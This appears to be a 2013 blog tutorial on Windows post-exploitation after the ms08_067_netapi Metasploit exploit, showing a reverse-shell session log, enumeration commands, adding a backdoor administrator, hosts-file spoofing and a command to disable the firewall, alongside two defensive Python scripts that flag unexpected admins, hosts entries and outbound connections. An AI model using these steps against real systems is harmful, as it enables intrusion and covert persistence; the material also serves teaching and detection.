Sunday, August 25, 2013

Post Exploitation :- Windows Shell commands

If you are trying to exploit Windows 2003 or Windows XP, the best and most widely known exploit is ms08_067_netapi. This post walks through post-exploitation and the different commands that can be run from the shell.

Successful Exploit on Windows 2003
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at 2013-08-24 14:41:21 -0400

Once the exploit has executed successfully, Metasploit throws a shell back to the attacker for interacting with the target. Since we are using a generic Windows reverse shell, it doesn't have as many options as a Meterpreter shell. However, a generic Windows shell can also be used for a lot of post-exploitation tasks.

To gain shell access

Boot.ini and Win.ini files: these two files give you some basic information about the target system.

Boot.ini contains information about the installed operating system(s) (basically the options displayed by the boot loader at startup).

Win.ini contains boot-time settings such as fonts, language settings, extensions, wallpaper, screensaver, communication drivers, etc.
It's good to know about the partition drives in the system so that an attacker can navigate through them and locate sensitive files.

The hosts file is an interesting one, as it can be used for local DNS spoofing. You can find an additional domain name added to the list, pointing to the attacker's machine (BackTrack).


net view: try enumerating more details about user accounts. net view shows the computer/host names in the specified domain. net domain shows the domain name. net localgroup administrators lists all local administrators on the system.

It is also possible to check the local user accounts with the net user command, and further we can also add a backdoor account. After adding such an account, it's also possible to add it to the local Administrators group for privileged access.
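The two artifacts described above (an extra local administrator and an extra hosts entry) are the ones a defender would want to baseline. The following is an added example, not code from the original post: it parses the output of net localgroup administrators and the contents of the hosts file, compares both against an expected baseline, and reports anything unexpected. The sample outputs, the account name "backdoor", the expected-admin list and the 192.0.2.x address are all constructed for the example.

```python
"""Baseline checks for two artifacts touched during post-exploitation:
the local Administrators group and the hosts file.
All sample text below is constructed to resemble Windows 2003 output."""

# Constructed sample of `net localgroup administrators` output.
NET_LOCALGROUP_OUTPUT = """Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
backdoor
Domain Admins
The command completed successfully.
"""

# Constructed sample hosts file with one appended line (192.0.2.0/24 is a
# documentation range, standing in for an attacker-controlled address).
HOSTS_FILE = """# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

127.0.0.1       localhost
192.0.2.10      update.example.com
"""

# Assumed baseline: which members are supposed to be in Administrators.
EXPECTED_ADMINS = {"administrator", "domain admins"}


def parse_net_localgroup(text):
    """Return the member names listed between the dashed separator and the
    trailing 'The command completed successfully.' status line."""
    members = []
    in_members = False
    for line in text.splitlines():
        if line.startswith("----"):
            in_members = True
            continue
        if in_members:
            if line.startswith("The command completed"):
                break
            if line.strip():
                members.append(line.strip())
    return members


def unexpected_admins(text, expected=EXPECTED_ADMINS):
    """Members of the Administrators group that are not in the baseline."""
    return [m for m in parse_net_localgroup(text) if m.lower() not in expected]


def parse_hosts(text):
    """Return (hostname, ip) pairs from a hosts file, ignoring comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip trailing comments
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            entries.append((name.lower(), ip))
    return entries


def suspicious_hosts_entries(text):
    """Flag every mapping except the stock loopback localhost line."""
    return [(name, ip) for name, ip in parse_hosts(text)
            if not (name == "localhost" and ip.startswith("127."))]


if __name__ == "__main__":
    for member in unexpected_admins(NET_LOCALGROUP_OUTPUT):
        print("unexpected local administrator:", member)
    for name, ip in suspicious_hosts_entries(HOSTS_FILE):
        print("unexpected hosts entry:", name, "->", ip)
```

On a real system the two inputs would come from `net localgroup administrators` and `%SystemRoot%\system32\drivers\etc\hosts`; the baseline set is the part that has to be maintained per host, since a domain-joined machine will legitimately list groups such as Domain Admins.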

The ipconfig command has more options for dealing with network configuration; some
of them are listed below:
/? Displays this help message
/all Displays full configuration information
/release Releases the IP address for the specified adapter
/renew Renews the IP address for the specified adapter
/flushdns Purges the DNS Resolver cache
/registerdns Refreshes all DHCP leases and reregisters DNS names
/displaydns Displays the contents of the DNS Resolver Cache
/showclassid Displays all the DHCP ClassIds allowed for the specified adapter
/setclassid Modifies the DHCP ClassId

Similarly, the netstat command lets you see the current network connections, routing table details, etc. The routing table can also be enumerated directly with the Windows command "route print".

More netstat options show the network connections along with the process ID that initiated each of them. The connections established by Metasploit are also listed in the output. The Windows findstr command can be used to filter the output.
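The same netstat output that shows the attacker's session to the operator is what a defender would scan for it. As an added example (not code from the original post), the script below parses constructed `netstat -ano` and `tasklist` output, joins them on PID, and flags every ESTABLISHED TCP connection whose remote port is not on a small allowlist; the 4444/tcp entry is constructed to mirror the LPORT of the Metasploit session shown earlier. The process names, PIDs, the allowlist and the 192.0.2.x / 198.51.100.x addresses are all assumptions made for the example.

```python
"""Parse `netstat -ano` and `tasklist` output and report established TCP
connections to ports outside an allowlist, with the owning process name.
All sample text is constructed; addresses come from RFC 5737 ranges."""

# Constructed `netstat -ano` output.
NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       748
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.0.2.15:1047        198.51.100.7:4444      ESTABLISHED     1824
  TCP    192.0.2.15:1052        198.51.100.20:80       ESTABLISHED     2208
  UDP    0.0.0.0:445            *:*                                    4
"""

# Constructed `tasklist` output for the same host.
TASKLIST_OUTPUT = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Console                    0         236 K
svchost.exe                    748 Console                    0       4,212 K
svchost.exe                   1824 Console                    0       5,104 K
iexplore.exe                  2208 Console                    0      18,776 K
"""

# Assumed allowlist of remote ports this host is expected to talk to.
EXPECTED_REMOTE_PORTS = {80, 443}


def parse_tasklist(text):
    """Map PID -> image name; data rows are the ones whose 2nd field is numeric."""
    pids = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1].isdigit():
            pids[int(parts[1])] = parts[0]
    return pids


def parse_netstat(text):
    """Return one dict per TCP row (UDP rows have no state column and are skipped)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            _proto, local, foreign, state, pid = parts
            host, port = foreign.rsplit(":", 1)   # rsplit keeps IPv6-style hosts intact
            rows.append({"local": local, "remote_host": host,
                         "remote_port": int(port), "state": state, "pid": int(pid)})
    return rows


def flag_connections(netstat_text, tasklist_text, allowed=EXPECTED_REMOTE_PORTS):
    """(pid, image, remote) for established connections to non-allowlisted ports."""
    names = parse_tasklist(tasklist_text)
    findings = []
    for row in parse_netstat(netstat_text):
        if row["state"] == "ESTABLISHED" and row["remote_port"] not in allowed:
            remote = "%s:%d" % (row["remote_host"], row["remote_port"])
            findings.append((row["pid"], names.get(row["pid"], "?"), remote))
    return findings


if __name__ == "__main__":
    for pid, image, remote in flag_connections(NETSTAT_OUTPUT, TASKLIST_OUTPUT):
        print("PID %d (%s) has an established connection to %s" % (pid, image, remote))
```

Joining on PID is what turns a bare port number into something actionable: an svchost.exe instance holding an outbound session to an arbitrary high port is the kind of finding that deserves a look, whereas the browser on 80/tcp is not.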

Netsh diagnostic (diag) commands can give you network configuration details such as DNS, the proxy server configured for IE, gateway, DHCP server, etc.

The netsh command ships with all Windows NT systems. It can be used to enumerate a plethora of configuration information about the target. The above screenshot shows the firewall configuration on the target system.
To enable windows firewall : netsh firewall set opmode enable
To disable windows firewall : netsh firewall set opmode disable

Service Control commands can query which services exist and their current status. It is also possible to start and stop these services.